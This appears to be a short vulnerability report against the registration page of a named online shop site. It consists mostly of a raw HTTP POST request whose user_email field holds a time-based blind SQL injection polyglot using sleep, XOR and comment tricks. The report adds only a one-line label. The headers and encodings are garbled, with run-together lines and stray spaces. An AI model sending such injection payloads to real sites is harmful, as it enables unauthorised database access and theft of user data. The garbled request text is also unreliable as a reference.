Vulnerability Website: http://www.360shop.com.cn post information:
POST/register. php HTTP/1.1Content-Length: 254Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://www.360shop.com.cn: 80/Cookie: 360shop_data = a % 3A2% 3A % 7Bs % 3A11% 3A % 22 autologinid % 22% 3Bs % 3A0% 3A % 22% 22% 3Bs % 3A6% 3A % 22 userid % 22% 3Bi % 3A-1% 3B % 7D; 360shop_sid = 41122db3f1f267c38aa9a68ff9158120; 360shop_validity_time = 0; PHPSESSID = l7498dqlinampsn9mga7gdlqi2Host: www.360shop.com. cnConnection: Keep-aliveAccept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 6.0a2) Gecko/20110613 Firefox/6.0a2Accept: */* action = register & code_sn = 94102 & isagreement = 1 & password = g00dPa % 24% 24w0rD & register = 1 & repassword = g00dPa % 24% 24w0rD & user_email = if (now () % 3 dsysdate () % 2 csleep (0) % 2c0)/* 'xor (if (now () % 3 dsysdate () % 2 csleep (0) % 2c0 )) OR '% 22XOR (if (now () % 3 dsysdate () % 2 csleep (0) % 2c0) OR % 22 */
User_email Vulnerability